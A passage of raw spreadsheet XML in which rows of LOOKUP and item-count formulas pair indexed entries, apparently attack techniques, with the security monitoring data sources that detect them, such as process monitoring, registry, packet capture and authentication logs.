        <f t="shared" si="5"/>
        <v>5</v>
      </c>
      <c r="E174" s="13">
        <f t="shared" si="6"/>
        <v>5</v>
      </c>
      <c r="F174" s="13"/>
      <c r="G174" s="19"/>
    </row>
    <row r="175" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A175" s="16" t="s">
        <v>250</v>
      </c>
      <c r="B175" s="13" t="str">
        <f>LOOKUP(A175,'REF-DataSources'!A:C)</f>
        <v>DLL monitoring,Process monitoring,Windows Registry</v>
      </c>
      <c r="C175" s="17" t="s">
        <v>34</v>
      </c>
      <c r="D175" s="13">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E175" s="13">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F175" s="13"/>
      <c r="G175" s="19"/>
    </row>
    <row r="176" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A176" s="16" t="s">
        <v>251</v>
      </c>
      <c r="B176" s="13" t="str">
        <f>LOOKUP(A176,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Authentication logs,DLL monitoring,Packet capture,Process monitoring,Windows Registry,Windows event logs</v>
      </c>
      <c r="C176" s="17" t="s">
        <v>252</v>
      </c>
      <c r="D176" s="13">
        <f t="shared" si="5"/>
        <v>7</v>
      </c>
      <c r="E176" s="13">
        <f t="shared" si="6"/>
        <v>7</v>
      </c>
      <c r="F176" s="13"/>
      <c r="G176" s="19"/>
    </row>
    <row r="177" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A177" s="16" t="s">
        <v>253</v>
      </c>
      <c r="B177" s="13" t="str">
        <f>LOOKUP(A177,'REF-DataSources'!A:C)</f>
        <v>Network protocol analysis,Packet capture,System calls,Process use of network,Process monitoring,Browser extensions</v>
      </c>
      <c r="C177" s="17" t="s">
        <v>254</v>
      </c>
      <c r="D177" s="13">
        <f t="shared" si="5"/>
        <v>6</v>
      </c>
      <c r="E177" s="13">
        <f t="shared" si="6"/>
        <v>6</v>
      </c>
      <c r="F177" s="13"/>
      <c r="G177" s="19"/>
    </row>
    <row r="178" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A178" s="16" t="s">
        <v>255</v>
      </c>
      <c r="B178" s="13" t="str">
        <f>LOOKUP(A178,'REF-DataSources'!A:C)</f>
        <v>API monitoring,DLL monitoring,File monitoring,Kernel drivers,Loaded DLLs,Process monitoring</v>
      </c>
      <c r="C178" s="17" t="s">
        <v>256</v>
      </c>
      <c r="D178" s="13">
        <f t="shared" si="5"/>
        <v>6</v>
      </c>
      <c r="E178" s="13">
        <f t="shared" si="6"/>
        <v>6</v>
      </c>
      <c r="F178" s="13"/>
      <c r="G178" s="19"/>
    </row>
    <row r="179" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A179" s="16" t="s">
        <v>257</v>
      </c>
      <c r="B179" s="13" t="str">
        <f>LOOKUP(A179,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Authentication logs,Windows event logs</v>
      </c>
      <c r="C179" s="17" t="s">
        <v>193</v>
      </c>
      <c r="D179" s="13">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E179" s="13">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F179" s="13"/>
      <c r="G179" s="19"/>
    </row>
    <row r="180" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A180" s="16" t="s">
        <v>258</v>
      </c>
      <c r="B180" s="13" t="str">
        <f>LOOKUP(A180,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Binary file metadata,DLL monitoring,Loaded DLLs,Process monitoring,Windows event logs</v>
      </c>
      <c r="C180" s="17" t="s">
        <v>259</v>
      </c>
      <c r="D180" s="13">
        <f t="shared" si="5"/>
        <v>6</v>
      </c>
      <c r="E180" s="13">
        <f t="shared" si="6"/>
        <v>6</v>
      </c>
      <c r="F180" s="13"/>
      <c r="G180" s="19"/>
    </row>
    <row r="181" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A181" s="16" t="s">
        <v>260</v>
      </c>
      <c r="B181" s="13" t="str">
        <f>LOOKUP(A181,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters,Windows Registry,File monitoring</v>
      </c>
      <c r="C181" s="17" t="s">
        <v>8</v>
      </c>
      <c r="D181" s="13">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E181" s="13">
        <f t="shared" si="6"/>
        <v>4</v>
      </c>
      <c r="F181" s="13"/>
      <c r="G181" s="19"/>
    </row>
    <row r="182" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A182" s="16" t="s">
        <v>261</v>
      </c>
      <c r="B182" s="13" t="str">
        <f>LOOKUP(A182,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Process monitoring</v>
      </c>
      <c r="C182" s="17" t="s">
        <v>89</v>
      </c>
      <c r="D182" s="13">
        <f t="shared" si="5"/>
        <v>2</v>
      </c>
      <c r="E182" s="13">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F182" s="13"/>
      <c r="G182" s="19"/>
    </row>
    <row r="183" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A183" s="16" t="s">
        <v>262</v>
      </c>
      <c r="B183" s="13" t="str">
        <f>LOOKUP(A183,'REF-DataSources'!A:C)</f>
        <v>Loaded DLLs,Process monitoring,Windows Registry</v>
      </c>
      <c r="C183" s="17" t="s">
        <v>34</v>
      </c>
      <c r="D183" s="13">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E183" s="13">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F183" s="13"/>
      <c r="G183" s="19"/>
    </row>
    <row r="184" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A184" s="16" t="s">
        <v>263</v>
      </c>
      <c r="B184" s="13" t="str">
        <f>LOOKUP(A184,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Windows Registry,Windows event logs</v>
      </c>
      <c r="C184" s="17" t="s">
        <v>15</v>
      </c>
      <c r="D184" s="13">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E184" s="13">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F184" s="13"/>
      <c r="G184" s="19"/>
    </row>
    <row r="185" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A185" s="16" t="s">
        <v>264</v>
      </c>
      <c r="B185" s="13" t="str">
        <f>LOOKUP(A185,'REF-DataSources'!A:C)</f>
        <v>Authentication logs</v>
      </c>
      <c r="C185" s="17">
        <v>100</v>
      </c>
      <c r="D185" s="13">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E185" s="13">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F185" s="13"/>
      <c r="G185" s="19"/>
    </row>
    <row r="186" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A186" s="16" t="s">
        <v>265</v>
      </c>
      <c r="B186" s="13" t="str">
        <f>LOOKUP(A186,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,Packet capture,Process monitoring,API monitoring</v>
      </c>
      <c r="C186" s="17" t="s">
        <v>266</v>
      </c>
      <c r="D186" s="13">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E186" s="13">
        <f t="shared" si="6"/>
        <v>4</v>
      </c>
      <c r="F186" s="13"/>
      <c r="G186" s="19"/>
    </row>
    <row r="187" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A187" s="16" t="s">
        <v>267</v>
      </c>
      <c r="B187" s="13" t="str">
        <f>LOOKUP(A187,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Process monitoring</v>
      </c>
      <c r="C187" s="17" t="s">
        <v>222</v>
      </c>
      <c r="D187" s="13">
        <f t="shared" si="5"/>
        <v>2</v>
      </c>
      <c r="E187" s="13">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F187" s="13"/>
      <c r="G187" s="19"/>
    </row>
    <row r="188" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A188" s="16" t="s">
        <v>268</v>
      </c>
      <c r="B188" s="13" t="str">
        <f>LOOKUP(A188,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Network protocol analysis,Network device logs,Process use of network</v>
      </c>
      <c r="C188" s="17" t="s">
        <v>269</v>
      </c>
      <c r="D188" s="13">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E188" s="13">
        <f t="shared" si="6"/>
        <v>4</v>
      </c>
      <c r="F188" s="13"/>
      <c r="G188" s="19"/>
    </row>
    <row r="189" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A189" s="16" t="s">
        <v>270</v>
      </c>
      <c r="B189" s="13" t="str">
        <f>LOOKUP(A189,'REF-DataSources'!A:C)</f>
        <v>Network protocol analysis,Netflow/Enclave netflow</v>
      </c>
      <c r="C189" s="17" t="s">
        <v>222</v>
      </c>
      <c r="D189" s="13">
        <f t="shared" si="5"/>
        <v>2</v>
      </c>
      <c r="E189" s="13">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F189" s="13"/>
      <c r="G189" s="19"/>
    </row>
    <row r="190" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A190" s="16" t="s">
        <v>271</v>
      </c>
      <c r="B190" s="13" t="str">
        <f>LOOKUP(A190,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Network device logs,Process use of network,Web proxy,Network intrusion detection system,SSL/TLS inspection</v>
      </c>
      <c r="C190" s="17" t="s">
        <v>272</v>
      </c>
      <c r="D190" s="13">
        <f t="shared" si="5"/>
        <v>6</v>
      </c>
      <c r="E190" s="13">
        <f t="shared" si="6"/>
        <v>6</v>
      </c>
      <c r="F190" s="13"/>
      <c r="G190" s="19"/>
    </row>
    <row r="191" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A191" s="16" t="s">
        <v>273</v>
      </c>
      <c r="B191" s="13" t="str">
        <f>LOOKUP(A191,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Web logs,Web application firewall logs,Application logs</v>
      </c>
      <c r="C191" s="17" t="s">
        <v>8</v>
      </c>
      <c r="D191" s="13">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E191" s="13">
        <f t="shared" si="6"/>
        <v>4</v>
      </c>
      <c r="F191" s="13"/>
      <c r="G191" s="19"/>
    </row>
    <row r="192" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A192" s="16" t="s">
        <v>274</v>
      </c>
      <c r="B192" s="13" t="str">
        <f>LOOKUP(A192,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters,Process use of network,Windows event logs</v>
      </c>
      <c r="C192" s="17" t="s">
        <v>275</v>
      </c>
      <c r="D192" s="13">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E192" s="13">
        <f t="shared" si="6"/>
        <v>4</v>
      </c>
      <c r="F192" s="13"/>
      <c r="G192" s="19"/>
    </row>
    <row r="193" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A193" s="16" t="s">
        <v>276</v>
      </c>
      <c r="B193" s="13" t="str">
        <f>LOOKUP(A193,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Web proxy,Email gateway,Detonation chamber,SSL/TLS inspection,DNS records,Mail server</v>
      </c>
      <c r="C193" s="17" t="s">
        <v>277</v>
      </c>
      <c r="D193" s="13">
        <f t="shared" si="5"/>
        <v>7</v>
      </c>
      <c r="E193" s="13">
        <f t="shared" si="6"/>
        <v>7</v>
      </c>
      <c r="F193" s="13"/>
      <c r="G193" s="19"/>
    </row>
    <row r="194" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A194" s="16" t="s">
        <v>278</v>
      </c>
      <c r="B194" s="13" t="str">
        <f>LOOKUP(A194,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Packet capture,Network intrusion detection system,Detonation chamber,Email gateway,Mail server</v>
      </c>
      <c r="C194" s="17" t="s">
        <v>279</v>
      </c>
      <c r="D194" s="13">
        <f t="shared" si="5"/>
        <v>6</v>
      </c>
      <c r="E194" s="13">
        <f t="shared" si="6"/>
        <v>6</v>
      </c>
      <c r="F194" s="13"/>
      <c r="G194" s="19"/>
    </row>
    <row r="195" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A195" s="16" t="s">
        <v>280</v>
      </c>
      <c r="B195" s="13" t="str">
        <f>LOOKUP(A195,'REF-DataSources'!A:C)</f>
        <v>SSL/TLS inspection,Anti-virus,Web proxy</v>
      </c>
      <c r="C195" s="17" t="s">
        <v>193</v>
      </c>
      <c r="D195" s="13">
        <f t="shared" ref="D195:D245" si="7">LEN(TRIM(B195))-LEN(SUBSTITUTE(TRIM(B195),",",""))+1</f>
        <v>3</v>
      </c>
      <c r="E195" s="13">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F195" s="13"/>
      <c r="G195" s="19"/>
    </row>
    <row r="196" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A196" s="16" t="s">
        <v>281</v>
      </c>
      <c r="B196" s="13" t="str">
        <f>LOOKUP(A196,'REF-DataSources'!A:C)</f>
        <v>Web proxy,File monitoring</v>
      </c>
      <c r="C196" s="17" t="s">
        <v>26</v>
      </c>
      <c r="D196" s="13">
        <f t="shared" si="7"/>
        <v>2</v>
      </c>
      <c r="E196" s="13">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F196" s="13"/>
      <c r="G196" s="19"/>
    </row>
    <row r="197" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A197" s="16" t="s">
        <v>282</v>
      </c>
      <c r="B197" s="13" t="str">
        <f>LOOKUP(A197,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Binary file metadata,DLL monitoring,Windows Registry,Windows event logs,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C197" s="17" t="s">
        <v>283</v>
      </c>
      <c r="D197" s="13">
        <f t="shared" si="7"/>
        <v>7</v>
      </c>
      <c r="E197" s="13">
        <f t="shared" si="6"/>
        <v>7</v>
      </c>
      <c r="F197" s="13"/>
      <c r="G197" s="19"/>
    </row>
    <row r="198" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A198" s="16" t="s">
        <v>284</v>
      </c>
      <c r="B198" s="13" t="str">
        <f>LOOKUP(A198,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Packet capture,Windows event logs</v>
      </c>
      <c r="C198" s="17" t="s">
        <v>70</v>
      </c>
      <c r="D198" s="13">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E198" s="13">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F198" s="13"/>
      <c r="G198" s="19"/>
    </row>
    <row r="199" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A199" s="16" t="s">
        <v>285</v>
      </c>
      <c r="B199" s="13" t="str">
        <f>LOOKUP(A199,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Application logs,DLL monitoring,Loaded DLLs,Process monitoring,Windows Registry,Windows event logs</v>
      </c>
      <c r="C199" s="17" t="s">
        <v>283</v>
      </c>
      <c r="D199" s="13">
        <f t="shared" si="7"/>
        <v>7</v>
      </c>
      <c r="E199" s="13">
        <f t="shared" si="6"/>
        <v>7</v>
      </c>
      <c r="F199" s="13"/>
      <c r="G199" s="19"/>
    </row>
    <row r="200" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A200" s="16" t="s">
        <v>286</v>
      </c>
      <c r="B200" s="13" t="str">
        <f>LOOKUP(A200,'REF-DataSources'!A:C)</f>
        <v>Application logs,Authentication logs,Third-party application logs</v>
      </c>
      <c r="C200" s="17" t="s">
        <v>15</v>
      </c>
      <c r="D200" s="13">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E200" s="13">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F200" s="13"/>
      <c r="G200" s="19"/>
    </row>
    <row r="201" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A201" s="16" t="s">
        <v>287</v>
      </c>
      <c r="B201" s="13" t="str">
        <f>LOOKUP(A201,'REF-DataSources'!A:C)</f>
        <v>Asset management,Data loss prevention</v>
      </c>
      <c r="C201" s="17" t="s">
        <v>89</v>
      </c>
      <c r="D201" s="13">
        <f t="shared" si="7"/>
        <v>2</v>
      </c>
      <c r="E201" s="13">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F201" s="13"/>
      <c r="G201" s="19"/>
    </row>
    <row r="202" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A202" s="16" t="s">
        <v>288</v>
      </c>
      <c r="B202" s="13" t="str">
        <f>LOOKUP(A202,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C202" s="17" t="s">
        <v>89</v>
      </c>
      <c r="D202" s="13">
        <f t="shared" si="7"/>
        <v>2</v>
      </c>
      <c r="E202" s="13">
        <f t="shared" ref="E202:E245" si="8">LEN(TRIM(C202))-LEN(SUBSTITUTE(TRIM(C202),";",""))+1</f>
        <v>2</v>
      </c>
      <c r="F202" s="13"/>
      <c r="G202" s="19"/>
    </row>
    <row r="203" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A203" s="16" t="s">
        <v>289</v>
      </c>
      <c r="B203" s="13" t="str">
        <f>LOOKUP(A203,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters,Windows event logs</v>
      </c>
      <c r="C203" s="17" t="s">
        <v>193</v>
      </c>
      <c r="D203" s="13">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E203" s="13">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F203" s="13"/>
      <c r="G203" s="19"/>
    </row>
    <row r="204" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A204" s="16" t="s">
        <v>290</v>
      </c>
      <c r="B204" s="13" t="str">
        <f>LOOKUP(A204,'REF-DataSources'!A:C)</f>
        <v>Anti-virus,System calls,Process monitoring</v>
      </c>
      <c r="C204" s="17" t="s">
        <v>37</v>
      </c>
      <c r="D204" s="13">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E204" s="13">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F204" s="13"/>
      <c r="G204" s="19"/>
    </row>
    <row r="205" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A205" s="16" t="s">
        <v>291</v>
      </c>
      <c r="B205" s="13" t="str">
        <f>LOOKUP(A205,'REF-DataSources'!A:C)</f>
        <v>Anti-virus,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C205" s="17" t="s">
        <v>37</v>
      </c>
      <c r="D205" s="13">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E205" s="13">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F205" s="13"/>
      <c r="G205" s="19"/>
    </row>
    <row r="206" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A206" s="16" t="s">
        <v>292</v>
      </c>
      <c r="B206" s="13" t="str">
        <f>LOOKUP(A206,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C206" s="17">
        <v>0</v>
      </c>
      <c r="D206" s="13">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E206" s="13">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F206" s="13"/>
      <c r="G206" s="19"/>
    </row>
    <row r="207" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A207" s="16" t="s">
        <v>293</v>
      </c>
      <c r="B207" s="13" t="str">
        <f>LOOKUP(A207,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process command-line parameters</v>
      </c>
      <c r="C207" s="17" t="s">
        <v>26</v>
      </c>
      <c r="D207" s="13">
        <f t="shared" si="7"/>
        <v>2</v>
      </c>
      <c r="E207" s="13">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
      <c r="F207" s="13"/>
      <c r="G207" s="19"/>
    </row>
    <row r="208" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A208" s="16" t="s">
        <v>294</v>
      </c>
      <c r="B208" s="13" t="str">
        <f>LOOKUP(A208,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Authentication logs,Network protocol analysis,Packet capture</v>
      </c>
      <c r="C208" s="17" t="s">
        <v>295</v>
      </c>
      <c r="D208" s="13">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E208" s="13">
        <f t="shared" si="8"/>
        <v>4</v>
      </c>
      <c r="F208" s="13"/>
      <c r="G208" s="19"/>
    </row>
    <row r="209" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A209" s="16" t="s">
        <v>296</v>
      </c>
      <c r="B209" s="13" t="str">
        <f>LOOKUP(A209,'REF-DataSources'!A:C)</f>
        <v>Windows event logs</v>
      </c>
      <c r="C209" s="17">
        <v>100</v>
      </c>
      <c r="D209" s="13">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E209" s="13">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F209" s="13"/>
      <c r="G209" s="19"/>
    </row>
    <row r="210" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A210" s="16" t="s">
        <v>297</v>
      </c>
      <c r="B210" s="13" t="str">
        <f>LOOKUP(A210,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Binary file metadata,DLL monitoring,File monitoring,Loaded DLLs,Process monitoring</v>
      </c>
      <c r="C210" s="17" t="s">
        <v>298</v>
      </c>
      <c r="D210" s="13">
        <f t="shared" si="7"/>
        <v>6</v>
      </c>
      <c r="E210" s="13">
        <f t="shared" si="8"/>
        <v>6</v>
      </c>
      <c r="F210" s="13"/>
      <c r="G210" s="19"/>
    </row>
    <row r="211" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A211" s="16" t="s">
        <v>299</v>
      </c>
      <c r="B211" s="13" t="str">
        <f>LOOKUP(A211,'REF-DataSources'!A:C)</f>
        <v>Windows Error Reporting,Process monitoring,File monitoring</v>
      </c>
      <c r="C211" s="17" t="s">
        <v>34</v>
      </c>
      <c r="D211" s="13">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E211" s="13">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F211" s="13"/>
      <c r="G211" s="19"/>
    </row>
    <row r="212" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A212" s="16" t="s">
        <v>300</v>
      </c>
      <c r="B212" s="13" t="str">
        <f>LOOKUP(A212,'REF-DataSources'!A:C)</f>
        <v>Windows Error Reporting,Process monitoring,File monitoring</v>
      </c>
      <c r="C212" s="17" t="s">
        <v>34</v>
      </c>
      <c r="D212" s="13">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E212" s="13">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F212" s="13"/>
      <c r="G212" s="19"/>
    </row>
    <row r="213" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A213" s="16" t="s">
        <v>301</v>
      </c>
      <c r="B213" s="13" t="str">
        <f>LOOKUP(A213,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,Windows Error Reporting,Process monitoring</v>
      </c>
      <c r="C213" s="17" t="s">
        <v>34</v>
      </c>
      <c r="D213" s="13">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E213" s="13">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F213" s="13"/>
      <c r="G213" s="19"/>
    </row>
    <row r="214" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A214" s="16" t="s">
        <v>302</v>
      </c>
      <c r="B214" s="13" t="str">
        <f>LOOKUP(A214,'REF-DataSources'!A:C)</f>
        <v>Application logs,Authentication logs,Data loss prevention,Third-party application logs</v>
      </c>
      <c r="C214" s="17" t="s">
        <v>8</v>
      </c>
      <c r="D214" s="13">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E214" s="13">
        <f t="shared" si="8"/>
        <v>4</v>
      </c>
      <c r="F214" s="13"/>
      <c r="G214" s="19"/>
    </row>
    <row r="215" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A215" s="16" t="s">
        <v>303</v>
      </c>
      <c r="B215" s="13" t="str">
        <f>LOOKUP(A215,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C215" s="17" t="s">
        <v>172</v>
      </c>
      <c r="D215" s="13">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E215" s="13">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F215" s="13"/>
      <c r="G215" s="19"/>
    </row>
    <row r="216" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A216" s="16" t="s">
        <v>304</v>
      </c>
      <c r="B216" s="13" t="str">
        <f>LOOKUP(A216,'REF-DataSources'!A:C)</f>
        <v>System calls,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C216" s="17" t="s">
        <v>15</v>
      </c>
      <c r="D216" s="13">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E216" s="13">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F216" s="13"/>
      <c r="G216" s="19"/>
    </row>
    <row r="217" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A217" s="16" t="s">
        <v>305</v>
      </c>
      <c r="B217" s="13" t="str">
        <f>LOOKUP(A217,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C217" s="17" t="s">
        <v>18</v>
      </c>
      <c r="D217" s="13">
        <f t="shared" si="7"/>
        <v>2</v>
      </c>
      <c r="E217" s="13">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
      <c r="F217" s="13"/>
      <c r="G217" s="19"/>
    </row>
    <row r="218" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A218" s="16" t="s">
        <v>306</v>
      </c>
      <c r="B218" s="13" t="str">
        <f>LOOKUP(A218,'REF-DataSources'!A:C)</f>
        <v>API monitoring,File monitoring,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C218" s="17" t="s">
        <v>8</v>
      </c>
      <c r="D218" s="13">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E218" s="13">
        <f t="shared" si="8"/>
        <v>4</v>
      </c>
      <c r="F218" s="13"/>
      <c r="G218" s="19"/>
    </row>
    <row r="219" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A219" s="16" t="s">
        <v>307</v>
      </c>
      <c r="B219" s="13" t="str">
        <f>LOOKUP(A219,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C219" s="17" t="s">
        <v>18</v>
      </c>
      <c r="D219" s="13">
        <f t="shared" si="7"/>
        <v>2</v>
      </c>
      <c r="E219" s="13">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
      <c r="F219" s="13"/>
      <c r="G219" s="19"/>
    </row>
    <row r="220" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A220" s="16" t="s">
        <v>308</v>
      </c>
      <c r="B220" s="13" t="str">
        <f>LOOKUP(A220,'REF-DataSources'!A:C)</f>
        <v>Network intrusion detection system,Network protocol analysis,Process use of network,Process monitoring</v>
      </c>
      <c r="C220" s="17" t="s">
        <v>8</v>
      </c>
      <c r="D220" s="13">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E220" s="13">
        <f t="shared" si="8"/>
        <v>4</v>
      </c>
      <c r="F220" s="13"/>
      <c r="G220" s="19"/>
    </row>
    <row r="221" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A221" s="16" t="s">
        <v>309</v>
      </c>
      <c r="B221" s="13" t="str">
        <f>LOOKUP(A221,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters,Process use of network,DLL monitoring</v>
      </c>
      <c r="C221" s="17" t="s">
        <v>275</v>
      </c>
      <c r="D221" s="13">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E221" s="13">
        <f t="shared" si="8"/>
        <v>4</v>
      </c>
      <c r="F221" s="13"/>
      <c r="G221" s="19"/>
    </row>
    <row r="222" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A222" s="16" t="s">
        <v>310</v>
      </c>
      <c r="B222" s="13" t="str">
        <f>LOOKUP(A222,'REF-DataSources'!A:C)</f>
        <v>Anti-virus,Email gateway,Network intrusion detection system,Web logs</v>
      </c>
      <c r="C222" s="17" t="s">
        <v>8</v>
      </c>
      <c r="D222" s="13">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E222" s="13">
        <f t="shared" si="8"/>
        <v>4</v>
      </c>
      <c r="F222" s="13"/>
      <c r="G222" s="19"/>
    </row>
    <row r="223" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A223" s="16" t="s">
        <v>311</v>
      </c>
      <c r="B223" s="13" t="str">
        <f>LOOKUP(A223,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters,Windows event logs</v>
      </c>
      <c r="C223" s="17" t="s">
        <v>147</v>
      </c>
      <c r="D223" s="13">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E223" s="13">
        <f t="shared" si="8"/>
        <v>4</v>
      </c>
      <c r="F223" s="13"/>
      <c r="G223" s="19"/>
    </row>
    <row r="224" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A224" s="16" t="s">
        <v>312</v>
      </c>
      <c r="B224" s="13" t="str">
        <f>LOOKUP(A224,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C224" s="17" t="s">
        <v>15</v>
      </c>
      <c r="D224" s="13">
